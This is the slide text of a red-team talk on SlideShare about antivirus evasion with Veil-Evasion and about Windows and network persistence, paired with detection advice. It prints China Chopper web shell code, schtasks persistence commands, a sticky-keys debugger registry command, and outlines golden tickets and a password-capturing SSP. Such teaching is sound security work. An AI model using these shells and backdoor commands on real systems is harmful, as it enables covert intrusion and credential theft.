SlideShare une entreprise Scribd logo

The Supporting Role of Antivirus Evasion while Persisting

C
CTruncer

This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.

Internet
1  sur  125
Télécharger pour lire hors ligne
The Supporting Role of Antivirus while Persisting @ChrisTruncer
Christopher Truncer Previous Systems Administrator turned Red Teamer Red Team Lead at Mandiant Florida State Seminole Open Source Developer @ChrisTruncer
What’s this talk about? ◉ How Stagers Work ◉ Case Study: Bypassing a Signature ◉ The Right Way to do Detection ◉ Persistence - lots of it! :) ◉ Old School and New School Techniques ◉ Persistence Detection ◉ Questions
Antivirus Evasion
Antivirus Evasion ◉ Whites hats and attackers need to evade antivirus ◉ Evading to establish immediate C&C of compromised system ◉ Also used to maintain access on a system/in a network
Antivirus Evasion ◉ If required to use an executable, we’ll use a stager ◉ Stager - Veil-Evasion or MSFVenom output ◉ Inject shellcode into memory ◉ Shellcode will download and inject a reflective dll ◉ A “loader” for your real malware
Stagers ◉ Stagers can be developed in any language that can interact with the Windows functions ◉ It’s not hard to write a stager ○ Just four function calls
Stagers ◉ Allocate memory to store shellcode, and set the proper memory permissions ◉ Copy shellcode into the allocated memory ◉ Create a thread to execute the shellcode ◉ Have code wait until thread is done executing
Stagers ◉ VirtualAlloc ◉ RtlMoveMemory ◉ CreateThread ◉ WaitforSingleObject
AV’s Approach to Catching Malware
Methods of Detection ◉ Signature Based ○ This is what Veil-Evasion targets ◉ Heuristics Based ◉ Crowd Sourced ○ Reputation Based
Veil’s Approach to Bypassing AV
Approaches to Bypassing AV ◉ Ghost code / net no-operation code ◉ Encrypted binaries ○ Hyperion ◉ Custom Code
Veil’s Approach ◉ Fight on-disk detection through different techniques ○ Obfuscated code ○ Encrypted code ○ Non-standard languages for Windows binaries ■ Python, Ruby, Perl, etc. ○ Shellcode-less binaries
Veil’s Approach ◉ Languages within Veil-Evasion ○ Python ○ Perl ○ PowerShell ○ C# ○ C ○ Go ○ Ruby
Veil’s Approach ◉ Using a language that’s not C or C# made a large difference ○ AV programs didn’t know or couldn’t properly inspect non-standard languages ◉ Example: ○ C vs. Python
Simply changing the language the code is written in completely bypassed all signatures.
Veil Module
Veil Module ◉ Add a little complexity, so it isn’t just easily obvious what is happening ◉ What about encrypting the code? ◉ What about making the tool brute-force its own key?
Stallion ◉ Generate a random encryption key, that is artificially constrained ○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567 ◉ Test for a known string with decryption key ○ If it doesn’t match, it’s the wrong key ○ If it matches, decrypt the shellcode and inject it into memory
Signature Bypass
Signature Bypass ◉ After approximately one year, Veil had its first AV signature
Signature Bypass ◉ I was excited to see if someone finally figured Veil-Evasion out ○ It is open source… ◉ Previous attempts have turned out fairly humorous
Persistence Hosts vs. Networks
Persistence Purposes ◉ Persistence is commonly used to for one of two purposes: ○ Persisting on a host ○ Persisting a network ◉ A lot of the techniques I will cover can facilitate access for both purposes
Persisting Hosts ◉ When persisting a host, an attacker is looking for ad-hoc, or programmatically defined access, to a system ○ Attacker want this as close to on-demand as possible ◉ The efforts undertaken by an attacker are directed to maintaining access to a specific host
Persisting Hosts ◉ What’s needed for persisting hosts? ○ Survive Reboots ■ Probably the most important concept ○ Have administrative rights on the system ○ Compliment network based persistence
Persisting Networks ◉ Network based persistence in two contexts ○ Used to maintain access into a network ■ Similar to host-based persistence, but its purpose isn’t for access to host, but the network ○ Used to maintain access into different networks ■ Don’t want to be VLANed off in in a VOIP network
Persisting Networks (continued) ◉ What’s other network based persistence options? ○ Attackers can use persistence not only to maintain access to a network, but also obtaining their required domain permissions on-demand ○ Access likely facilitated through a host-based persistence technique
Persisting Networks
Web Shells ◉ Funny, this seems trivial and too easy that no one would ever use this… ◉ ...that’s not the case ○ China Chopper - APT17, APT19, APT22 ○ ITSecShell, reDuh, ASPShell ○ Even commodity code
China Chopper ◉ Very tiny webshell, about 4kb stored server side ◉ Developed in a variety of languages ○ CFM ○ ASP ○ PHP ○ Etc. ◉ A client application is used to interact with the webshell
China Chopper Server Code ◉ ASP ○ <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsa fe");%> ◉ PHP ○ <?php @eval($_POST['password']);?> https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
China Chopper ◉ Really useful features in China Chopper ○ File Explorer ○ Upload/Download files ○ Mod file timestamp attributes ○ Database client - MSSQL, MySQL ○ Command shell
Web Shell Prevention & Detection ◉ Hunt/Sweep for known bad files ○ Hashes, or other file based indicators ◉ Blacklist all filetypes except expected files for upload functionality ◉ Don’t allow your web server to execute files uploaded from untrusted sources
Magic Packet ◉ Or “how to access port 12345 with a packet to port 443” ◉ The attacker’s problem: ○ Compromised a web server (port 80 and 443 are in use) ○ Firewall(s) prevent connection to any other port ○ Wants a TCP backdoor to be remotely accessible ■ Can’t be bothered to write a webshell
Magic Packet ◉ Run backdoor listening on port 12345 ◉ Run malware “low” in the network stack ○ Check incoming TCP SYN packets ○ When a SYN packet is received with a specific signature, change destination port from 443 to 12345 ○ Windows network stack then delivers the pack to port 12345 ○ Malware alters the port in all subsequent packets for the stream
Syn, dport: 443 data=s3cr37 Malware Syn, dport: 12345 SynAck sport: 12345 SynAck sport: 443 12345 Compromised System 443
Magic Packet - Defenses ◉ This malware was installed via a custom compiled executable ○ Application Whitelisting ○ Device Guard
Outlook ◉ Outlook rules can help provide a very unique on-demand foothold onto a host ◉ Silent Break wrote a post on leveraging Outlook rules to gain access to a user’s system ◉ Provides access immediately when Outlook triggers the rule
Outlook ◉ Attacker creates an Outlook rule to execute a binary when the “trigger” subject is received ◉ Attacker will sync the rule against the target user’s account ◉ Send an e-mail with the trigger in the subject ◉ Get shell :)
Outlook - Additional Tweaks ◉ Have another rule auto-delete the incoming e-mail to prevent user detection of the trigger ○ https://silentbreaksecurity.com/malicious-outlook-rules/
Outlook - Detection ◉ Honestly, not certain on the best means to detect this at scale ◉ Primary IOC is to execute a program when receiving an e-mail ○ I don’t know if any legit use cases for this
Persisting Hosts
Registry Hacks ◉ This is the 101 method for persistence that almost everyone learns ◉ Extremely easy to set up, and can be installed with a range of permissions
Registry Hacks ◉ These can be configured to run when the system starts, or a user logs into the system ○ HKLMSOFTWAREMicrosoftWindowsCurrentVersionR un ○ HKCUSOFTWAREMicrosoftWindowsCurrentVersionR un ◉ These methods are highly publicized and well known. ◉ Defensive tools look for these
Registry Hacks - Takeaway ◉ These can be good for maintaining initial access, but not for long term use ◉ SOCs - you want to have the ability to detect these
Startup Folder ◉ Your system will execute files in the startup folder ○ C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup
Scheduled Tasks ◉ Scheduled tasks are an easy way for a user of any level to persist on a system ◉ With the proper permissions, you can schedule a task up to the SYSTEM level ◉ This is Microsoft’s recommendation/alternative to using “at” jobs
Scheduled Tasks ◉ Scheduled tasks can be created from the command line with schtasks.exe or the GUI ◉ Tasks can run at startup, when a user logs into the system, after the system has been idle, etc. ◉ Tasks can run binaries, PowerShell one-liners, and more
Scheduled Tasks ◉ schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:userschrisdownloadssafe.exe ◉ schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:totallylegit.exe /s winsqldbsystem
Scheduled Tasks - Detection ◉ Obtain a baseline of the scheduled tasks set to run on your systems ○ Schtasks /query ○ Task scheduler ○ Etc. ◉ Audit systems and identify deviations from your baseline
Service Manipulation ◉ Services usually run with SYSTEM level permissions, so can be juicy targets for attackers ◉ Easy way to install service based persistence? Check service binary write permissions!
Service Manipulation ◉ Now that you found services that can be modified, you just need a service binary. ○ Veil-Evasion, PowerUp, custom code ◉ Save the original service binary ◉ Bounce the box (or service) if required
Sticky Keys ◉ With administrative access to a machine, you can easily setup sticky keys ○ Copy sethc.exe ○ Copy cmd.exe to C:WindowsSystem32sethc.exe ○ Reboot, and hit shift five times
Sticky Keys - Another Method ◉ Set cmd.exe as the debugger for sethc.exe ◉ REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"
Sticky Keys - Another Method ◉ Main problem - doesn’t require authentication ◉ If using Sticky Keys, ensure it’s calling back to a location you control, vs. opening up the system for everyone
Sticky Keys - Detection ◉ Compare known good sethc.exe binary hash with systems’ current sethc.exe binary ◉ Ensure no registry key is added defining a debugger for sethc.exe
New School Persistence Techniques
DLL Search Order Hijack ◉ DLL search order hijacking exploits how windows searches for DLLs when loading an executable ◉ Specifically, it exploits the fact that Windows will always search the currently folder of the executable for a dll
DLL Search Order Hijack ◉ Sample in CAPEC ○ If you drop ntshrui.dll within C:Windows and run explorer.exe, you can get the dll within C:Windows to be executed ◉ This exploits the order in which the dll is searched for on a Windows system
DLL Search Order Hijack ◉ Attackers create malicious DLLs that exploit this search order to get their DLL to run on a system ◉ Since it’s every time the application runs, it can be used as a persistence technique ◉ PowerUp can be used to find these opportunities
DLL Search Order Hijack ◉ Used by the following actors: ○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26 ◉ Used by the following malware: ○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER
Legitimate Scheduled Tasks ◉ Easy to identify scheduled tasks named “Evil task” ◉ First we must look at how investigators detect malicious scheduled tasks
Legitimate Scheduled Tasks ◉ Stacking tasks across multiple systems to determine anomalous tasks ◉ Parse task scheduler log (schedLgu.txt)
Legitimate Scheduled Tasks ◉ What if we modify existing legit scheduled tasks? ○ Specifically tasks that are not required for Windows functionality
Unquoted Service Paths ◉ Unquoted service paths exploit a vulnerability in the order that Windows searches for a binary when a space is in an unquoted path ○ C:Program Files(x86)SteamSteam Gamingsteam.exe
Unquoted Service Paths ◉ C:Program Files(x86)SteamSteam Gamingsteam.exe ○ C:Program.exe ○ C:Program Files(x86)SteamSteam.exe ○ C:Program Files(x86)SteamSteam Gamingsteam.exe ◉ Three opportunities
Unquoted Service Paths ◉ If we have write access to any of the paths that Windows looks for, we can hijack the service ○ Just need a service binary ◉ Drop it into any of the paths on the previous slide, and restart the service ○ Might need to wait for a reboot
Unquoted Service Paths - Prevention ◉ Check service binaries on your images and determine if any are using unquoted service paths. ◉ Make sure the paths aren’t writable to non-admins. ◉ PowerUp can find these as well
WMI Requirements ◉ Event Filter ◉ Event Consumer ◉ Filter/Consumer Binding
WMI Requirements - Event Filter ◉ The WMI query that fires upon an event occurring ○ Usually, an event class derived from __InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent
WMI Requirements - Event Consumer ◉ There are five different event consumers ○ The most interesting one is “CommandLineEventConsumer” ◉ These “consume” or act on events that occur
WMI Requirements - Filter/Consumer Binding ◉ This associates a WMI Event Filter with the Event Consumer
WMI - Persistence ◉ PowerSploit’s persistence module for WMI ○ Automates the creation process ○ Will create a permanent WMI event subscription
PowerShell Profiles ◉ Anytime PowerShell runs, it will execute code in the default profile ◉ Create profile code here: ○ C:WindowsSystem32WindowsPowerShellv1.0profile.p s1
PowerShell Profiles ◉ Use standard persistence mechanism to execute PowerShell silently ○ "C:WindowsSystem32WindowsPowerShellv1.0powers hell.exe" -NonInteractive -WindowStyle Hidden ○ It’s a legit exe!
PowerShell Profiles ◉ Example in profile.ps1: ○ iex("write-host 'hello world'")
Security Support Provider ◉ A Security Support Provider (SSP) - a security package ○ An extension used to perform authentication during client/server exchange ◉ An Authentication Package (AP) ○ Extends interactive login authentication ○ Example: RSA tokens
Security Support Provider ◉ SSP/AP ○ Can serve tasks of SSPs and APs - loaded into lsass at boot ○ Example: Kerberos and msv1_0 (NTLM)
Security Support Provider ◉ Install your own SSP that is loaded into lsass.exe ◉ Can develop your own SSP DLL ◉ Use Persistence module in PowerSploit to install your malicious SSP
Security Support Provider ◉ Ben Delpy (@gentilkiwi) added SSP functionality into mimilib.dll ○ Once installed and loaded into lsass.exe, it captures plaintext passwords
Excel Magic ◉ Malicious macro executes backdoor ◉ How can you ensure persistence? ○ Most users will run Excel once a day ○ You can use any “old school” techniques to spawn Excel ○ Disable macro settings to run macro without user prompt
Excel Magic ◉ Registry modification that opens specific Workbook upon starting Excel ○ HKEY_CURRENT_USERSoftwareMicrosoftOffice12.0Ex celSecurityTrusted Locations ○ Just add the location
Additional Persistence Opportunities
Golden Tickets ◉ Method was developed with Ben Delpy and Sean Metcalf ◉ Forges a “golden” kerberos ticket which can be good for 10 years! ◉ Golden tickets provide on-demand domain privilege “upgrades” for any group within the domain
Golden Tickets ◉ Only need four pieces of information ○ Domain SID ○ Name of the domain ○ User you want to create a ticket for ○ Krbtgt account hash ◉ You can build your ticket at home, offline
Golden Ticket Takeaways ◉ If impersonating an account, tickets are still valid even if password changes ◉ Valid for as long as you specify (10 year default) ◉ Domain trusts ○ Child domains can compromise the parent ◉ Only way to stop is change krbtgt hash… twice… ◉ Or rebuild from bare metal
Account Checkout - Case Study ◉ Client had account checkout system for domain administrator accounts ◉ Only two users with access to checkout system ◉ System requires 2FA ◉ DA access is lost if user changes their password/pin/token ◉ Users can see checked out accounts
Account Checkout - Case Study ◉ Persist domain administrator without getting caught ○ Can’t continuously check out accounts ◉ Password vault permissions were managed through Active Directory groups ○ Tons of them
Account Checkout - Case Study ◉ Copy group memberships to a compromised user account ○ User doesn’t use the Password Vault ■ All changes were documented ◉ This gave us all the permissions we needed without needing access to their Password Vault
Account Checkout - Case Study ◉ Copy group memberships to a compromised user account ○ User doesn’t use the Password Vault ■ All changes were documented ◉ This gave us all the permissions we needed without needing access to their Password Vault
Conclusions
Conclusions ◉ Persistence will remain rampant ◉ Always new and creative ways to maintain persistence ◉ Understanding persistence techniques is critical to detecting attacker access
Thanks! ANY QUESTIONS? @ChrisTruncer Christopher.Truncer@mandiant.com

Recommandé

Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
 
AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0CTruncer
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level MalwareCTruncer
 
Veil-Ordnance
Veil-OrdnanceVeil-Ordnance
Veil-OrdnanceVeilFramework
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusCTruncer
 
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreA Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreCTruncer
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
The Art of AV Evasion - Or Lack Thereof
The Art of AV Evasion - Or Lack ThereofThe Art of AV Evasion - Or Lack Thereof
The Art of AV Evasion - Or Lack ThereofCTruncer
 

Recommandé

Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
 
AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0CTruncer
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level MalwareCTruncer
 
Veil-Ordnance
Veil-OrdnanceVeil-Ordnance
Veil-OrdnanceVeilFramework
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusCTruncer
 
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreA Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreCTruncer
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil FrameworkVeilFramework
 
The Art of AV Evasion - Or Lack Thereof
The Art of AV Evasion - Or Lack ThereofThe Art of AV Evasion - Or Lack Thereof
The Art of AV Evasion - Or Lack ThereofCTruncer
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-FrameworkVeilFramework
 
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000CTruncer
 
Hacking - Breaking Into It
Hacking - Breaking Into ItHacking - Breaking Into It
Hacking - Breaking Into ItCTruncer
 
Pentester++
Pentester++Pentester++
Pentester++CTruncer
 
An EyeWitness View into your Network
An EyeWitness View into your NetworkAn EyeWitness View into your Network
An EyeWitness View into your NetworkCTruncer
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationCTruncer
 
CheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareCheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareBrandon Arvanaghi
 
Egress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data ExfiltrationEgress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data ExfiltrationCTruncer
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityBrandon Arvanaghi
 
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!CTruncer
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Minded Security
 
Pen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and MorePen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and MoreCTruncer
 
Bsides tampa
Bsides tampaBsides tampa
Bsides tampaOctavio Paguaga
 
0d1n
0d1n0d1n
0d1nAntonio Costa aka Cooler_
 
Who’s afraid of WinDbg
Who’s afraid of WinDbgWho’s afraid of WinDbg
Who’s afraid of WinDbgDror Helper
 
Debugging NET Applications With WinDBG
Debugging NET Applications With WinDBGDebugging NET Applications With WinDBG
Debugging NET Applications With WinDBGCory Foy
 
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp
 
L2
L2L2
L2Asst.prof.Dr.jassim Mohammed
 
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad SarangNull Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarangnullowaspmumbai
 

Contenu connexe

Tendances

Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000CTruncer
 
Hacking - Breaking Into It
Hacking - Breaking Into ItHacking - Breaking Into It
Hacking - Breaking Into ItCTruncer
 
Pentester++
Pentester++Pentester++
Pentester++CTruncer
 
An EyeWitness View into your Network
An EyeWitness View into your NetworkAn EyeWitness View into your Network
An EyeWitness View into your NetworkCTruncer
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationCTruncer
 
CheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareCheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareBrandon Arvanaghi
 
Egress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data ExfiltrationEgress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data ExfiltrationCTruncer
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityBrandon Arvanaghi
 
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!CTruncer
 
Entomology 101
Entomology 101Entomology 101
Entomology 101snyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railssnyff
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Minded Security
 
Pen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and MorePen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and MoreCTruncer
 
Who’s afraid of WinDbg
Who’s afraid of WinDbgWho’s afraid of WinDbg
Who’s afraid of WinDbgDror Helper
 
Debugging NET Applications With WinDBG
Debugging NET Applications With WinDBGDebugging NET Applications With WinDBG
Debugging NET Applications With WinDBGCory Foy
 
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp
 

Tendances (20)

The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-Framework
 
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
 
Hacking - Breaking Into It
Hacking - Breaking Into ItHacking - Breaking Into It
Hacking - Breaking Into It
 
Pentester++
Pentester++Pentester++
Pentester++
 
An EyeWitness View into your Network
An EyeWitness View into your NetworkAn EyeWitness View into your Network
An EyeWitness View into your Network
 
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationWhat Goes In Must Come Out: Egress-Assess and Data Exfiltration
What Goes In Must Come Out: Egress-Assess and Data Exfiltration
 
CheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted MalwareCheckPlease: Payload-Agnostic Targeted Malware
CheckPlease: Payload-Agnostic Targeted Malware
 
Egress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data ExfiltrationEgress-Assess and Owning Data Exfiltration
Egress-Assess and Owning Data Exfiltration
 
CheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant SecurityCheckPlease - Payload-Agnostic Implant Security
CheckPlease - Payload-Agnostic Implant Security
 
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!Passive Intelligence Gathering and Analytics - It's All Just Metadata!
Passive Intelligence Gathering and Analytics - It's All Just Metadata!
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to railsRuxmon feb 2013 what happened to rails
Ruxmon feb 2013 what happened to rails
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018
 
Pen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and MorePen Testing, Red Teaming, and More
Pen Testing, Red Teaming, and More
 
Bsides tampa
Bsides tampaBsides tampa
Bsides tampa
 
0d1n
0d1n0d1n
0d1n
 
Who’s afraid of WinDbg
Who’s afraid of WinDbgWho’s afraid of WinDbg
Who’s afraid of WinDbg
 
Debugging NET Applications With WinDBG
Debugging NET Applications With WinDBGDebugging NET Applications With WinDBG
Debugging NET Applications With WinDBG
 
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn ViệtSecurity Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn Việt
Security Bootcamp 2013 - Difficulties of malware analysis - Nguyễn Chấn Việt
 

En vedette

Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad SarangNull Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarangnullowaspmumbai
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkVeilFramework
 
3 Things Every Sales Team Needs to Be Thinking About in 2017
3 Things Every Sales Team Needs to Be Thinking About in 20173 Things Every Sales Team Needs to Be Thinking About in 2017
3 Things Every Sales Team Needs to Be Thinking About in 2017Drift
 
Ceh v5 module 19 evading ids firewall and honeypot
Ceh v5 module 19 evading ids firewall and honeypotCeh v5 module 19 evading ids firewall and honeypot
Ceh v5 module 19 evading ids firewall and honeypotVi Tính Hoàng Nam
 
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahNull 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahnullowaspmumbai
 
Static analysis for security
Static analysis for securityStatic analysis for security
Static analysis for securityFadi Abdulwahab
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suiteUtkarsh Bhargava
 
The real and another
The real and anotherThe real and another
The real and anotherIshika Biswas
 
Staged Patching Approach in Oracle E-Business Suite
Staged Patching Approach in Oracle E-Business SuiteStaged Patching Approach in Oracle E-Business Suite
Staged Patching Approach in Oracle E-Business Suitevasuballa
 
Comparative Study of Mod Security (Autosaved)
Comparative Study of Mod Security (Autosaved)Comparative Study of Mod Security (Autosaved)
Comparative Study of Mod Security (Autosaved)Dashti Abdullah
 
Clientside attack using HoneyClient Technology
Clientside attack using HoneyClient TechnologyClientside attack using HoneyClient Technology
Clientside attack using HoneyClient TechnologyJulia Yu-Chin Cheng
 
Cyber Security Visualization
Cyber Security VisualizationCyber Security Visualization
Cyber Security VisualizationDoug Cogswell
 
The Beginning Of World War Ii
The Beginning Of World War IiThe Beginning Of World War Ii
The Beginning Of World War Iikathomas
 

En vedette (17)

L2
L2L2
L2
 
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad SarangNull Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
 
3 Things Every Sales Team Needs to Be Thinking About in 2017
3 Things Every Sales Team Needs to Be Thinking About in 20173 Things Every Sales Team Needs to Be Thinking About in 2017
3 Things Every Sales Team Needs to Be Thinking About in 2017
 
Insider threat kill chain
Insider threat kill chainInsider threat kill chain
Insider threat kill chain
 
Ceh v5 module 19 evading ids firewall and honeypot
